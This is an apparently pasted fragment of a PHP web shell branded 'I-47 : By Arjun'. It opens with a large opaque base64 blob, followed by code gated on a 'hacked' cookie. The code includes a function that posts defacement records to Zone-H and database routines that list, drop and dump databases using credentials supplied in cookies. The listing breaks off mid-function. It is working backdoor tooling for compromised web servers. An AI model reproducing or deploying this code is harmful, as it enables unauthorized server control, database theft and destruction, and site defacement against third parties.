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";
  96.  
  97. ?>
  98. <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  99. <title>I-47 : By Arjun</title>
  100. <script type="text/javascript">
  101. checked = false;
  102. function checkedAll ()
  103. {
  104. if (checked == false){checked = true}else{checked = false}
  105. for (var i = 0; i < document.getElementById('myform').elements.length; i++)
  106. {
  107. document.getElementById('myform').elements[i].checked = checked;
  108. }
  109. }
  110. </script>
  111. <style type="text/css">
  112. <!--
  113.  
  114. body,td,th {
  115. color: #FF0000;
  116. }
  117. input.but {
  118. background-color:#006633;
  119. color: white;
  120. border : 1px solid #ccc;
  121. }
  122. a:link {
  123. color: #00FF00;
  124. text-decoration:none;
  125. font-weight:600;
  126. }
  127. a:hover {
  128. color:#00FF00;
  129. text-decoration:underline;
  130. }
  131. font.txt
  132. {
  133. color: #00FF00;
  134. text-decoration:none;
  135. font-size:17px;
  136. }
  137. a:visited {
  138. color: #006600;
  139. }
  140. input.box
  141. {
  142. background-color:#0C0C0C;
  143. color: white;
  144. border : 1px solid #ccc;
  145. -moz-border-radius:7px;
  146. width:400;
  147. border-radius:7px;
  148. }
  149. input.sbox
  150. {
  151. background-color:#0C0C0C;
  152. color: white;
  153. border : 1px solid #ccc;
  154. -moz-border-radius:7px;
  155. width:180;
  156. border-radius:7px;
  157. }
  158. select.sbox
  159. {
  160. background-color:#0C0C0C;
  161. color: white;
  162. border : 1px solid #ccc;
  163. -moz-border-radius:7px;
  164. width:180;
  165. border-radius:7px;
  166. }
  167. select.box
  168. {
  169. background-color:#0C0C0C;
  170. color: white;
  171. border : 1px solid #ccc;
  172. -moz-border-radius:7px;
  173. width:400;
  174. border-radius:7px;
  175. }
  176.  
  177. textarea.box
  178. {
  179. border : 3px solid #111;
  180. background-color:#161616;
  181. color : white;
  182. margin-top: 10px;
  183. -moz-border-radius:7px;
  184. border-radius:7px;
  185. }
  186. body {
  187. background-color:#000000;
  188. }
  189. -->
  190. </style>
  191. <body>
  192. <?php
  193. if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass))
  194. {
  195.  
  196. $self=$_SERVER["PHP_SELF"];
  197. $os = "N/D";
  198. if(stristr(php_uname(),"Windows"))
  199. {
  200. $SEPARATOR = '\\';
  201. $os = "Windows";
  202. $directorysperator="\\";
  203.  
  204. }
  205. else if(stristr(php_uname(),"Linux"))
  206. {
  207. $os = "Linux";
  208. $directorysperator='/';
  209.  
  210. }
  211. function Trail($d,$directsperator)
  212. {
  213. $d=explode($directsperator,$d);
  214. array_pop($d);
  215. array_pop($d);
  216. $str=implode($d,$directsperator);
  217. return $str;
  218. }
  219.  
  220.  
  221.  
  222. // Zone-h Poster
  223. function ZoneH($url, $hacker, $hackmode,$reson, $site )
  224. {
  225. $k = curl_init();
  226. curl_setopt($k, CURLOPT_URL, $url);
  227. curl_setopt($k,CURLOPT_POST,true);
  228. curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
  229. curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
  230. curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  231. $kubra = curl_exec($k);
  232. curl_close($k);
  233. return $kubra;
  234. }
  235.  
  236. // Database functions
  237. function listdatabase()
  238. {
  239. $self=$_SERVER["PHP_SELF"];
  240. $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
  241. $result = mysql_query("SHOW DATABASE");
  242. echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
  243.  
  244. $pDB = mysql_list_dbs( $mysqlHandle );
  245. $num = mysql_num_rows( $pDB );
  246. for( $i = 0; $i < $num; $i++ )
  247. {
  248. $dbname = mysql_dbname( $pDB, $i );
  249. mysql_select_db($dbname,$mysqlHandle);
  250. $result = mysql_query("SHOW TABLES");
  251. $num_of_tables = mysql_num_rows($result);
  252. echo "<tr>\n";
  253. echo "<td><a href='$self?action=listTables&dbname=$dbname'><font color=red size=3>$dbname</font></a> ($num_of_tables)</td>\n";
  254. echo "<td><a href='$self?action=listTables&dbname=$dbname'>Tables</a></td>\n";
  255. echo "<td><a href='$self?action=dropDB&dbname=$dbname&executequery' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
  256. echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
  257. echo "</tr>\n";
  258. }
  259. echo "</table>\n";
  260. mysql_close($mysqlHandle);
  261. }
  262.  
  263. function listtable()
  264. {
  265. $self=$_SERVER["PHP_SELF"];
